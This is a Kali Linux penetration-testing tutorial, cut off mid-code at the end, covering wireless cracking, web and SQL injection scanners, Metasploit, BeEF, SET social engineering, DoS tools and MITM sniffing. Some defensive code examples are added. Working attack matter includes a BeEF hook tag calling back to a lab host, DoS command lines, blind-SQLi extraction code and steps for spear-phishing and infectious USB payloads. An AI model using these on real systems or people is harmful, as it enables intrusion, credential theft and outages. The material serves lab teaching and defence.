Step 1 − To launch it, open a terminal and type “kismet”.

Step 2 − Click “OK”.

Step 3 − Click “Yes” when it asks to start the Kismet server; the client cannot do anything without it.

Step 4 − Leave the startup options at their defaults and click “Start”.

Step 5 − A dialog now asks you to define a capture source (the wireless card). Click Yes.

Step 6 − In this case, the wireless source is “wlan0”. Enter it in the “Intf” field → click “Add”.

Step 7 − Kismet starts sniffing and lists the Wi-Fi networks it sees.

Step 8 − Click on any network to see its details (BSSID, channel, encryption, clients).

GISKismet

GISKismet is a wireless visualisation tool that represents data gathered with Kismet in a practical way. It stores the information in a database so we can query the data and generate graphs using SQL. GISKismet currently uses SQLite for the database and Google Earth / KML files for graphing.

Let’s learn how to use this tool.

Step 1 − To open GISKismet, go to Applications → Click “Wireless Attacks” → giskismet.

As you remember from the previous section, we used Kismet to explore data about wireless networks, and Kismet writes all of this data to netXML files.

Step 2 − To import such a file into GISKismet, type “giskismet -x Kismetfilename.netxml”; the import starts immediately.

Once imported, the hotspots we found before can be exported to a KML file with a query, for example giskismet -q "select * from wireless" -o networks.kml, and opened in Google Earth.

Step 3 − Assuming that Google Earth is already installed, click File → Open, select the file that GISKismet created, and click “Open”. The map of the access points will be displayed.

Ghost Phisher

Ghost Phisher is a popular tool that creates fake wireless access points and then stages man-in-the-middle attacks (DNS and DHCP spoofing, credential-harvesting web pages) against the clients that connect to them.

Step 1 − To open it, click Applications → Wireless Attacks → “Ghost Phisher”.

Step 2 − After opening it, set up the fake AP using the following details.

  • Wireless Interface Input: wlan0
  • SSID: the name the fake AP will advertise
  • IP address: the IP the AP will use on its own network
  • Key (WPA): the password clients must supply to connect to this SSID

Step 3 − Click the Start button.

Wifite

It is another wireless cracking tool, one which attacks multiple WEP, WPA and WPS networks in a row without further interaction.

First, the wireless card has to be in monitor mode.

Step 1 − To open it, go to Applications → Wireless Attacks → Wifite.

Step 2 − Type “wifite” to scan for networks (adding “--showb” also prints the BSSID of each network in the list).

Step 3 − To stop scanning and select targets, press Ctrl + C.

Step 4 − Type “1” to attack the first network in the list.

Step 5 − When the attack completes, the key is displayed. For WPA this again depends on capturing a handshake and on the passphrase being in the wordlist; for WPS it depends on the AP being vulnerable to a PIN attack.

In this chapter, we will learn about the website penetration testing tools offered by Kali Linux.

Vega Usage

Vega is a free and open source scanner and testing platform for web application security. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.

Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection. Vega can be extended using a powerful API in the language of the web: JavaScript. The official webpage is https://subgraph.com/vega/

Step 1 − To open Vega go to Applications → 03-Web Application Analysis → Vega

Step 2 − If the application does not appear under that menu, it can be started from a terminal instead.

Step 3 − To start a scan, click the “+” sign.

Step 4 − Enter the URL of the site to be scanned. In this case, it is the Metasploitable machine → click “Next”.

Step 5 − Check the boxes of the modules (injection, XSS, information disclosure and so on) you want to run. Then, click “Next”.

Step 6 − Click “Next” again on the following screen.

Step 7 − Click “Finish”.

Step 8 − If a dialog asks whether to follow redirects, click “Yes”.

The scan then runs, showing its progress.

Step 9 − After the scan is completed, the lower-left panel lists all the findings, categorised by severity. If you click one, the right panel shows the details of the vulnerability: the “Request” that triggered it, a “Discussion” of the issue, its “Impact”, and the suggested “Remediation”. Treat the scanner output as a list of candidates to verify by hand, not as confirmed vulnerabilities.

ZapProxy

OWASP ZAP (Zed Attack Proxy) is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. It is written in Java and runs as an intercepting proxy between your browser and the target, with an active scanner on top.

Step 1 − To open ZAP, go to Applications → 03-Web Application Analysis → owaspzap.

Step 2 − Click “Accept” on the licence dialog.

ZAP will start to load.

Step 3 − Choose one of the session options offered (whether and where to persist the session) and click “Start”.

The target in this example is the Metasploitable web server at IP 192.168.1.101.

Step 4 − Enter the URL of the target site under “URL to attack” → click “Attack”. This runs the spider and then the active scanner against everything the spider found.

After the scan is completed, the top left panel (“Sites”) lists all the crawled sites.

In the bottom panel, under the “Alerts” tab, you will see all the findings along with their descriptions.

Step 5 − Click the “Spider” tab to see all the links that were crawled.

Database Tools Usage

sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, over fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Let’s learn how to use sqlmap.

Step 1 − To open sqlmap, go to Applications → 04-Database Assessment → sqlmap.

The webpage with parameters vulnerable to SQL injection is on the Metasploitable machine.

Step 2 − To start the SQL injection testing, type “sqlmap -u” followed by the full target URL including its query string, for example (with a hypothetical path) sqlmap -u "http://192.168.1.101/page.php?id=1". Quote the URL so the shell does not interpret an “&” between parameters. Adding “--batch” accepts the default answer to every prompt.

Step 3 − From the results, you will see which parameters are injectable and by which technique (boolean-based blind, error-based, time-based blind, UNION query); sqlmap tests each GET/POST parameter in turn.
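To see what sqlmap’s “boolean-based blind” technique actually tests, here is an added example (written for this page, not sqlmap’s code). It stands up a constructed vulnerable page and a parameterised, safe one, both backed by an in-memory SQLite database, runs the true/false check against both, and then uses the same oracle to extract a value one character at a time. The table, rows and parameter are assumptions.

```python
import sqlite3
from typing import Callable

Fetch = Callable[[str], str]   # parameter value -> response body, standing in for an HTTP GET


def _fresh_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return db


def make_vulnerable_app() -> Fetch:
    """Constructed stand-in for the target page: the parameter is concatenated into the SQL text."""
    db = _fresh_db()

    def fetch(value: str) -> str:
        try:
            rows = db.execute("SELECT name FROM users WHERE id = " + value).fetchall()
        except sqlite3.Error:
            return "<html>error</html>"
        return "<html>" + ", ".join(r[0] for r in rows) + "</html>"
    return fetch


def make_safe_app() -> Fetch:
    """The same page with a parameterised query; the checks below find nothing here."""
    db = _fresh_db()

    def fetch(value: str) -> str:
        rows = db.execute("SELECT name FROM users WHERE id = ?", (value,)).fetchall()
        return "<html>" + ", ".join(r[0] for r in rows) + "</html>"
    return fetch


def boolean_sqli(fetch: Fetch, value: str) -> bool:
    """Boolean-based blind check, one of sqlmap's techniques.

    The TRUE condition must reproduce the original page AND the FALSE condition must
    change it. Requiring both avoids flagging a page that simply differs between requests.
    """
    base = fetch(value)
    true_page = fetch(f"{value} AND 1=1")
    false_page = fetch(f"{value} AND 1=2")
    return base == true_page and base != false_page


def blind_extract(fetch: Fetch, value: str, subquery: str,
                  charset: str = "abcdefghijklmnopqrstuvwxyz0123456789_", max_len: int = 32) -> str:
    """Once injectable, the same true/false oracle reads data one character at a time.
    substr() past the end of the string matches nothing, which ends the loop."""
    base = fetch(value)
    out = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            probe = f"{value} AND substr(({subquery}),{pos},1)='{ch}'"
            if fetch(probe) == base:
                out += ch
                break
        else:
            break
    return out


if __name__ == "__main__":
    vuln, safe = make_vulnerable_app(), make_safe_app()
    print("vulnerable app injectable:", boolean_sqli(vuln, "1"))
    print("safe app injectable:", boolean_sqli(safe, "1"))
    print("extracted:", blind_extract(vuln, "1", "SELECT name FROM users WHERE id=2"))
```

sqlmap does the same thing with hundreds of payload variants, page-similarity heuristics instead of exact comparison, and database-specific functions in place of substr(); the fix it points at is the one in make_safe_app: bind parameters, never concatenate.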

sqlninja

sqlninja is a tool targeted at exploiting SQL injection vulnerabilities in web applications that use Microsoft SQL Server as their back-end, with the aim of turning an injection into full access to the database server (up to a shell on the host). Full information regarding this tool can be found on http://sqlninja.sourceforge.net/

Step 1 − To open sqlninja go to Applications → 04-Database Assessment → sqlninja.

CMS Scanning Tools

WPScan

WPScan is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues: the WordPress version, the installed plugins and themes, the known vulnerabilities in those versions, plus user enumeration and password brute-forcing.

Step 1 − To open WPScan go to Applications → 03-Web Application Analysis → “wpscan”.

A terminal with the usage text opens.

Step 2 − To scan a website for vulnerabilities, type “wpscan --url” followed by the site’s URL.

If the local vulnerability database is out of date, the scanner asks you to update it. This is recommended, since that database is where the findings come from.

Once the scan starts, the findings are printed as they are found; in the original screenshot the vulnerabilities are marked with a red arrow.

Joomscan

Joomla is one of the most widely used CMSs because of its flexibility, and Joomscan is a scanner for it. It helps web developers and web masters identify possible security weaknesses on their deployed Joomla sites.

Step 1 − To open it, click the terminal on the left panel, then run “joomscan” with the desired parameters.

Step 2 − To get help on the usage, type “joomscan /?”

Step 3 − To start the scan, type “joomscan -u” followed by the URL of the target.

The results list the Joomla version detected and the potential vulnerabilities, with a suggestion for each.

SSL Scanning Tools

TLSSLed is a Linux shell script used to evaluate the security of a target SSL/TLS (HTTPS) web server implementation. It is based on sslscan, a thorough SSL/TLS scanner built on the OpenSSL library, and on the “openssl s_client” command-line tool.

The current tests include checking whether the target supports the SSLv2 protocol, the NULL cipher, weak ciphers based on their key length (40 or 56 bits), the availability of strong ciphers (like AES), whether the digital certificate is MD5 signed, and the current SSL/TLS renegotiation capabilities.

To start testing, open a terminal and type “tlssled” followed by the host and port (for example, tlssled 192.168.1.101 443). It connects, retrieves the certificate and runs the checks above.

From the findings, shown in green in the original screenshot, you can see that the certificate was valid until 2018. Note that TLSSLed’s checks predate several later issues (SSLv3/POODLE, RC4, weak Diffie-Hellman parameters, the deprecation of TLS 1.0 and 1.1); for a current assessment, run sslscan or testssl.sh directly as well.

w3af

w3af is a Web Application Attack and Audit Framework which aims to identify and exploit all web application vulnerabilities. This package provides a Graphical User Interface (GUI) for the framework. If you want a command-line application only, install w3af-console.

The framework has been called the “metasploit for the web”, but it’s actually much more, as it also discovers web application vulnerabilities using black-box scanning techniques. The w3af core and its plugins are fully written in Python. The project has more than 130 plugins, which identify and exploit SQL injection, cross-site scripting (XSS), remote file inclusion and more.

Step 1 − To open it, go to Applications → 03-Web Application Analysis → Click w3af.

Step 2 − Under “Target”, enter the URL of the target, which in this case is the Metasploitable web address.

Step 3 − Select a scan profile (which plugins to run) → Click “Start”.

Step 4 − Go to “Results” to see each finding with its details.

In this chapter, we will learn about the various exploitation tools offered by Kali Linux.

Metasploit

As we mentioned before, Metasploit is a product of Rapid7 and most of the resources can be found on their web page www.metasploit.com. It is available in two forms: the commercial Metasploit Pro and the free, open source Metasploit Framework. Kali ships the Framework, which contains all the modules and the msfconsole interface used in this tutorial; Pro adds a web interface, reporting and automation on top.

As an Ethical Hacker, you will be using the Kali distribution, which has the Metasploit Framework embedded, along with the other ethical hacking tools, which saves installation time. However, if you want to install it as a separate tool, it is an application that can be installed on operating systems like Linux, Windows and OS X.

First, open the Metasploit console in Kali: go to Applications → Exploitation Tools → Metasploit. This launches msfconsole; before the first run, “msfdb init” sets up the PostgreSQL database that Metasploit uses to store hosts, services and loot.

After it starts, the banner shows the version of Metasploit and the number of exploit, payload and auxiliary modules loaded.

In the console, if you type help or ?, it will show you a list of the msfconsole commands along with their description. You can choose based on your needs and what you will use.

Another important administration task is updating Metasploit so that the latest exploit modules are available. On Kali this is done through the package manager (apt update && apt install metasploit-framework) rather than with the msfupdate command, which Kali no longer supports; the update can take several minutes.

It has a useful command called “search” which you can use to find what you want. For example, to find exploits related to Microsoft, the command can be −

msf > search name:Microsoft type:exploit

Where “search” is the command, “name” filters on the module name we are looking for, and “type” restricts the results to a kind of module (exploit, auxiliary, post, payload).

Another command is “info”, used with a module name. It provides the information regarding a module: the platforms and targets where it is used, who the author is, the vulnerability references (CVE and so on), and the payload restrictions that it has.

Armitage

Armitage is a GUI front-end for Metasploit that complements it. It visualises targets, recommends exploits, and exposes the advanced post-exploitation features.

Let’s open it. Armitage talks to Metasploit over RPC and needs the Metasploit database running, so start PostgreSQL first (“msfdb start”, or “msfdb init” on the first run). To open Armitage, go to Applications → Exploitation Tools → Armitage.

Click the Connect button in the connection dialog; if no Metasploit RPC server is running yet, Armitage offers to start one.

Armitage is user friendly. The “Targets” area lists all the machines that you have discovered and are working with; compromised targets are shown in red with a lightning-bolt overlay.

After you have compromised a target, you can right-click on it and continue with post-exploitation actions, such as browsing the folders on the victim.

The file browser that opens in the lower pane lets you navigate the victim’s folders by clicking, without typing Meterpreter commands.

The module tree elsewhere in the GUI lists the exploit, auxiliary and post modules, organised by type and platform.

BeEF

BeEF stands for Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. BeEF allows the professional penetration tester to assess the actual security posture of a target environment using client-side attack vectors.

First, you have to update the Kali package using the following commands −

root@kali:/# apt-get update  
root@kali:/# apt-get install beef-xss 

To start, use the following command −

root@kali:/# cd /usr/share/beef-xss  
root@kali:/# ./beef

Kali Package

Open the browser and log in with the username and password, both “beef”.

Open Browser

The BeEF hook is a JavaScript file hosted on the BeEF server that needs to run in client browsers. When it does, it calls back to the BeEF server and communicates a lot of information about the target. It also allows additional commands and modules to be run against the target. In this example, the BeEF hook is located at http://192.168.1.101:3000/hook.js.

In order to attack a browser, include the JavaScript hook in a page that the client will view. There are a number of ways to do that, but the easiest is to insert the following into a page and somehow get the client to open it.

<script src="http://192.168.1.101:3000/hook.js" type="text/javascript"></script>

Once the page loads, go back to the BeEF Control Panel and click “Online Browsers” on the top left. After a few seconds, you should see your IP address pop-up representing a hooked browser. Hovering over the IP will quickly provide information such as the browser version, operating system, and what plugins are installed.

Page Load

To run a command remotely, click the “Owned” host. Then, in the Commands tab, click the module that you want to execute, and finally click “Execute”.

Run Remotely

Linux Exploit Suggester

It suggests possible exploits given the kernel release version (the output of ‘uname -r’) of the Linux operating system.

To run it, type the following command −

root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

3.0.0 is the kernel version of Linux OS that we want to exploit.

Kernel Version

In this chapter, we will learn about the forensics tools available in Kali Linux.

p0f

p0f is a tool that can identify the operating system of a target host simply by examining captured packets, even when the device in question is behind a packet firewall. p0f does not generate any additional network traffic, direct or indirect: no name lookups, no mysterious probes, no ARIN queries, nothing. In the hands of advanced users, p0f can detect firewall presence, NAT use, and the existence of load balancers.

Type “p0f -h” in the terminal to see how to use it; you will get the following results.

Target Host
Advanced Users

It will list even the available interfaces.

Available Interface

Then, type the following command: “p0f -i eth0 -p -o filename”.

Where the parameter “-i” is the interface name as shown above. “-p” means it is in promiscuous mode. “-o” means the output will be saved in a file.

Type of Command

Open a webpage with the address 192.168.1.2

Webpage Address

From the results, you can observe that the Webserver is using apache 2.x and the OS is Debian.

pdf-parser

pdf-parser is a tool that parses a PDF document to identify the fundamental elements used in the analyzed PDF file. It will not render a PDF document. It is not a textbook example of a PDF parser, but it gets the job done. Generally, it is used for PDF files that you suspect have a script embedded in them.

The command is −

pdf-parser  -o 10 filepath

where “-o” selects the object number to display.

Number Object

As you can see in the following screenshot, the pdf file opens a CMD command.

CMD Command
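pdf-parser leaves the interpretation to you. The following Python, an added example that is not part of this page or of the pdf-parser tool, does the same walk over the indirect objects and flags the dictionary keys that make a reader act on open, including the /Launch action behind the CMD prompt seen above. The minimal PDF is constructed, and compressed streams are not decoded.

```python
import re
from typing import Dict, List

# Dictionary keys that make a PDF reader do something on its own: run script,
# launch a program, or carry an embedded file. pdf-parser shows these in clear
# text when the object is not hidden inside a compressed stream.
SUSPICIOUS_KEYS = (b"/OpenAction", b"/AA", b"/JavaScript", b"/JS",
                   b"/Launch", b"/EmbeddedFile")

# "N G obj ... endobj" for every indirect object (streams are not decoded).
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.DOTALL)

# Constructed sample: a catalog whose OpenAction is a Launch action, the
# structure behind "the pdf file opens a CMD command" above.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
3 0 obj
<< /Type /Action /S /Launch /F (cmd.exe) /P (/c echo constructed sample) >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""


def find_suspicious_objects(pdf: bytes) -> Dict[int, List[str]]:
    """Return {object id: [keys found]} for objects carrying any SUSPICIOUS_KEYS."""
    hits: Dict[int, List[str]] = {}
    for m in OBJ_RE.finditer(pdf):
        obj_id, body = int(m.group(1)), m.group(3)
        # The look-ahead stops /JS from matching the start of a longer name.
        found = [k.decode() for k in SUSPICIOUS_KEYS
                 if re.search(re.escape(k) + rb"(?![A-Za-z])", body)]
        if found:
            hits[obj_id] = found
    return hits


def launch_target(pdf: bytes, obj_id: int) -> str:
    """For a /Launch action object, return its /F entry (the program it starts)."""
    for m in OBJ_RE.finditer(pdf):
        if int(m.group(1)) != obj_id:
            continue
        body = m.group(3)
        if not re.search(rb"/S\s*/Launch\b", body):
            return ""
        f = re.search(rb"/F\s*\(([^)]*)\)", body)
        return f.group(1).decode("latin-1") if f else ""
    return ""


def triage(pdf: bytes) -> List[str]:
    """One human-readable line per flagged object, the notes you would otherwise
    write down by hand while stepping through pdf-parser output."""
    lines = []
    for obj_id, keys in sorted(find_suspicious_objects(pdf).items()):
        note = f"obj {obj_id}: {', '.join(keys)}"
        target = launch_target(pdf, obj_id)
        if target:
            note += f" -> launches {target}"
        lines.append(note)
    return lines


if __name__ == "__main__":
    print("\n".join(triage(SAMPLE_PDF)))
```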

Dumpzilla

Dumpzilla is developed in Python 3.x and its purpose is to extract all forensically interesting information from Firefox, Iceweasel, and SeaMonkey browsers for analysis.

ddrescue

It copies data from one file or block device (hard disc, cdrom, etc.) to another, trying to rescue the good parts first in case of read errors.

The basic operation of ddrescue is fully automatic. That is, you don’t have to wait for an error, stop the program, restart it from a new position, etc.

If you use the mapfile feature of ddrescue, the data is rescued very efficiently (only the needed blocks are read). Also, you can interrupt the rescue at any time and resume it later at the same point. The mapfile is an essential part of ddrescue’s effectiveness. Use it unless you know what you are doing.

The command line is −

dd_rescue infilepath outfilepath

In the screenshot, the parameter “-v” means verbose, “/dev/sdb” is the device to be rescued, and the img file is the recovered image.

Recovered Image

DFF

It is another forensic tool used to recover the files. It has a GUI too. To open it, type “dff-gui” in the terminal and the following web GUI will open.

DFF GUI

Click File → “Open Evidence”.

Open Evidence

The following dialog will open. Check “Raw format” and click “+” to select the folder that you want to recover.

Raw Format

Then, you can browse the files on the left of the pane to see what has been recovered.

Browse File

In this chapter, we will learn about the social engineering tools used in Kali Linux.

Social Engineering Toolkit Usage

The Social-Engineer Toolkit (SET) is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to build a believable attack in a fraction of the time. These kinds of tools exploit human behavior to lure people into the attack vectors.

Let’s learn how to use the Social Engineer Toolkit.

Step 1 − To open SET, go to Applications → Social Engineering Tools → Click “SET” Social Engineering Tool.

Social Engineering Tools

Step 2 − It will ask if you agree with the terms of usage. Type “y” as shown in the following screenshot.

Type Y

Step 3 − Most of the menus shown in the following screenshot are self-explanatory; among them, the most important is number 1, “Social Engineering Attacks”.

Self Explained

Step 4 − Type “1” → Enter. A submenu will open. If you press the Enter button again, you will see the explanations for each submenu.

The Spear-phishing module allows you to specially craft email messages and send them to your targeted victims with attached FileFormat malicious payloads. For example, you can send a malicious PDF document which, if the victim opens it, will compromise the system. If you want to spoof your email address, be sure “Sendmail” is installed (apt-get install sendmail) and change the config/set_config flag SENDMAIL=OFF to SENDMAIL=ON.

There are two options for the spear phishing attack −

  • Perform a Mass Email Attack
  • Create a FileFormat Payload and a Social-Engineering Template

The first one is letting SET do everything for you (option 1), the second one is to create your own FileFormat payload and use it in your own attack.

Third Party

Type “99” to go back to the main menu and then type “2” to go to “The web attack vectors”.

The web attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim. This module is used to perform phishing attacks against the victim, triggered when they click the link. There is a wide variety of attacks that can occur once they click a link.

Multi Attack

Type “99” to return to the main menu and then type “3”.

The infectious USB/CD/DVD module will create an autorun.inf file and a Metasploit payload. The payload and autorun file are burned or copied onto a USB. When the DVD/USB/CD is inserted in the victim’s machine, it will trigger the autorun feature (if autorun is enabled) and hopefully compromise the system. You can pick the attack vector you wish to use: file-format bugs or a straight executable.

Following are the options for Infectious Media Generator.

  • File-Format Exploits
  • Standard Metasploit Executable

Infectious

Type “99” to go back to the main menu. Then, type “4” to go to “Create a Payload and Listener”.

The create payload and listener is a simple way to create a Metasploit payload. It will export the exe file for you and generate a listener. You would need to convince the victim to download the exe file and execute it to get the shell.

Create Payload

Type “99” to go back to the main menu and then type “5” to go to “Mass Mailer Attack”.

Web Attack Vector

The mass mailer attack will allow you to send multiple emails to victims and customize the messages. There are two options on the mass e-mailer; the first is to send an email to a single email address. The second option allows you to import a list that has all recipient emails and it will send your message to as many people as you want within that list.

  • E-Mail Attack Single Email Address
  • E-Mail Attack Mass Mailer

Type “99” to go back to the main menu and then type “9” to go to “Powershell Attack Vector”.

Powershell

The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks allow you to use PowerShell, which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventive technologies.

  • Powershell Alphanumeric Shellcode Injector
  • Powershell Reverse Shell
  • Powershell Bind Shell
  • Powershell Dump SAM Database

Stressing tools are used to create DoS attacks or to stress-test different applications so as to take appropriate measures for the future.

All the Stress testing tools are found in Applications → 02-Vulnerability Analysis → Stress testing.

Vulnerability Analysis

All stress tests will be done on the Metasploitable machine, which has the IP 192.168.1.102.

Stress Testing

Slowhttptest

Slowhttptest is one of the DoS attack tools. It uses the HTTP protocol to connect to the server and keep its resources, such as CPU and RAM, busy. Let’s see in detail how to use it and explain its functions.

To open slowhttptest, first open the terminal and type “slowhttptest -parameters”.

You can type “slowhttptest -h” to see all the parameters that you need to use. In case you receive the output ‘Command not found’, you first have to type “apt-get install slowhttptest”.

Show Http Test
Command Not Found

Then, after installation, again type slowhttptest -h.

Slow Headers

Type the following command −

slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET -u http://192.168.1.202/index.php -x 24 -p 2

Where,

  • -c 500 = 500 connections
  • -H = Slowloris mode (slow headers)
  • -g = generate statistics
  • -o outputfile = output file name
  • -i 10 = 10-second interval between follow-up data
  • -r 200 = open 200 connections per second
  • -t GET = use GET requests
  • -u http://192.168.1.202/index.php = target URL
  • -x 24 = maximum length of 24 bytes for follow-up data
  • -p 2 = 2-second timeout

Time Seconds

Once the test starts, the output will be as shown in the following screenshot, where you can notice that the service is available.

Test Starts

After a while, at the 287th connection the service goes down. This means that the server can handle a maximum of 287 HTTP connections.

Connection
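Slowloris-style tests like the one above succeed when the server lets a client hold a worker while it trickles in request headers. As an added example, not from this page or the slowhttptest project, here is an Apache httpd configuration fragment contrasting permissive settings with hardened ones; it assumes mod_reqtimeout is loaded, and the numbers are starting points rather than tuned values.

```apache
# Permissive values (shown commented out): a client may take minutes to finish
# sending headers, and each such connection pins a worker the whole time.
# Timeout 300
# KeepAliveTimeout 15

# Hardened values: bound how long any single connection may sit idle.
Timeout 30
KeepAlive On
KeepAliveTimeout 5

# mod_reqtimeout is what defeats slow-header (-H) and slow-body clients: the
# request line and headers must arrive within 10 s, extended by 1 s for every
# 500 bytes received but never beyond 20 s; the body gets the same limits.
# A client sending 24 bytes every 10 s (-x 24 -i 10) is cut off at the 10 s mark.
<IfModule reqtimeout_module>
    RequestReadTimeout header=10-20,MinRate=500 body=10-20,MinRate=500
</IfModule>

# MaxRequestWorkers caps concurrent connections on the prefork MPM. When slow
# clients occupy every slot the service stops answering, which is what the
# "287 connections" mark above shows; raising this only buys time unless the
# read timeouts are in place too.
<IfModule mpm_prefork_module>
    MaxRequestWorkers 256
</IfModule>
```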

Inviteflood

Inviteflood is a SIP/SDP INVITE message flooding tool over UDP/IP. It runs on a variety of Linux distributions. It carries out DoS (Denial of Service) attacks against SIP devices by sending multiple INVITE requests.

To open Inviteflood, first open the terminal and type “inviteflood -parameters”.

For help, you can use “inviteflood -h”.

Invite Flood

Next, you can use the following command −

inviteflood eth0 target_extension  target_domain target_ip number_of_packets

Where,

  • target_extension is 2000
  • target_domain is 192.168.x.x
  • target_ip is 192.168.x.x
  • number_of_packets is 1
  • -a is the alias of the SIP account

Target Execution

Iaxflood

Iaxflood is a VoIP DoS tool. To open it, type “iaxflood sourcename destinationname numpackets” in the terminal.

To know how to use it, type “iaxflood -h”.

Iaxflood

thc-ssl-dos

THC-SSL-DOS is a tool to verify the performance of SSL. Establishing a secure SSL connection requires 15x more processing power on the server than on the client. THC-SSL-DOS exploits this asymmetric property by overloading the server and knocking it off the Internet.

Following is the command −

thc-ssl-dos victimIP httpsport --accept

In this example, it will be −

thc-ssl-dos 192.168.1.1 443 --accept

Its output would be as follows −

SSL Performance
SSL Error

The basic concept of sniffing tools is as simple as wiretapping and Kali Linux has some popular tools for this purpose. In this chapter, we will learn about the sniffing and spoofing tools available in Kali.

Burpsuite

Burpsuite can be used as a sniffing tool between your browser and the webservers to find the parameters that the web application uses.

To open Burpsuite, go to Applications → Web Application Analysis → burpsuite.

Web Analysis

To set up sniffing, we configure Burp Suite to behave as a proxy. To do this, go to Options as shown in the following screenshot and check the box as shown.

In this case, the proxy IP will be 127.0.0.1 with port 8080.

Proxy IP

Then configure the browser proxy which is the IP of burpsuite machine and the port.

Configure Browser

To start interception, go to Proxy → Intercept → click “Intercept is on”.

Continue navigating the webpage where you want to find the parameters to test for vulnerabilities.

Intercept

In this case, it is the Metasploitable machine with IP 192.168.1.102.

Machine IP

Go to “HTTP History”. In the following screenshot, the line marked with a red arrow shows the last request. In the Raw tab, hidden parameters such as the session ID and other parameters such as the user name and password are underlined in red.

Request Parameter

mitmproxy

mitmproxy is an SSL-capable man-in-the-middle HTTP proxy. It provides a console interface that allows traffic flows to be inspected and edited on the fly.

To open it, go to the terminal and type “mitmproxy -parameter”; for help on the commands, type “mitmproxy -h”.

Mitmproxy

To start mitmproxy, type “mitmproxy -p portnumber”. In this case, it is “mitmproxy -p 80”.

Port Number

Wireshark

Wireshark is one of the best data packet analyzers. It analyzes packets in depth, down to the frame level. You can get more information on Wireshark from its official webpage: https://www.wireshark.org/. In Kali, it is found under the following path: Applications → Sniffing & Spoofing → wireshark.

Wireshark

Once you click wireshark, the following GUI opens up.

Wireshark GUI

Click “Start” and the packet capturing will start as shown in the following screenshot.

Packet Capturing

sslstrip

sslstrip implements a MITM attack that forces a victim’s browser to communicate in plain text over HTTP while the proxy modifies the content it receives from the HTTPS server. To do this, sslstrip “strips” https:// URLs and turns them into http:// URLs.

To open it, go to Applications → 09-Sniffing & Spoofing → Spoofing and MITM → sslstrip.

Spoofing
Application MITM

To set it up, write a rule that forwards all port 80 traffic to port 8080.

Port Communication

Then, start the sslstrip command for the port needed.

SSLstrip Command
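HSTS is the browser-side defence against this: once a site has sent a Strict-Transport-Security header over HTTPS, the browser refuses the http:// version that sslstrip serves. As an added example (not from this page or the sslstrip project), the Python below evaluates that header and looks for plain-HTTP links back to the site's own host, the trace a stripped page leaves; the two responses and the host bank.example are constructed.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import urlparse

# Constructed responses: what the real origin sends, and what a client sitting
# behind sslstrip receives for the same page (HSTS header gone, links rewritten).
ORIGIN_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    b"\r\n"
    b'<html><a href="https://bank.example/login">Log in</a>'
    b'<form action="https://bank.example/auth"></form></html>'
)
STRIPPED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b'<html><a href="http://bank.example/login">Log in</a>'
    b'<form action="http://bank.example/auth"></form></html>'
)


def parse_response(raw: bytes) -> Tuple[int, Dict[str, str], str]:
    """Split a raw HTTP/1.x response into (status code, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split()[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body.decode("utf-8", "replace")


def hsts_policy(headers: Dict[str, str], min_age: int = 31536000) -> Dict[str, object]:
    """Evaluate Strict-Transport-Security: present, at least a year, covers subdomains."""
    value = headers.get("strict-transport-security", "")
    directives: Dict[str, str] = {}
    for part in value.split(";"):
        name, _, arg = part.strip().partition("=")
        if name:
            directives[name.lower()] = arg.strip().strip('"')
    try:
        max_age = int(directives.get("max-age", "0"))
    except ValueError:
        max_age = 0
    return {"present": bool(value), "max_age": max_age,
            "long_enough": max_age >= min_age,
            "include_subdomains": "includesubdomains" in directives}


def downgraded_links(body: str, host: str) -> List[str]:
    """http:// links back to our own host. An HTTPS origin never emits these, so
    finding them in what the client received is sslstrip's fingerprint."""
    urls = re.findall(r"""(?:href|action|src)\s*=\s*["']([^"']+)""", body, re.I)
    return [u for u in urls
            if urlparse(u).scheme == "http" and urlparse(u).hostname == host]


def audit(raw: bytes, host: str) -> List[str]:
    """Findings for one response as the client saw it; an empty list means clean."""
    _status, headers, body = parse_response(raw)
    policy = hsts_policy(headers)
    findings: List[str] = []
    if not policy["present"]:
        findings.append("no HSTS header: browser will accept a plain-HTTP copy of this site")
    elif not policy["long_enough"]:
        findings.append(f"HSTS max-age {policy['max_age']} is below one year")
    elif not policy["include_subdomains"]:
        findings.append("HSTS does not cover subdomains")
    findings += [f"plain-HTTP link to own host: {u}" for u in downgraded_links(body, host)]
    return findings


if __name__ == "__main__":
    for label, raw in (("origin", ORIGIN_RESPONSE), ("stripped", STRIPPED_RESPONSE)):
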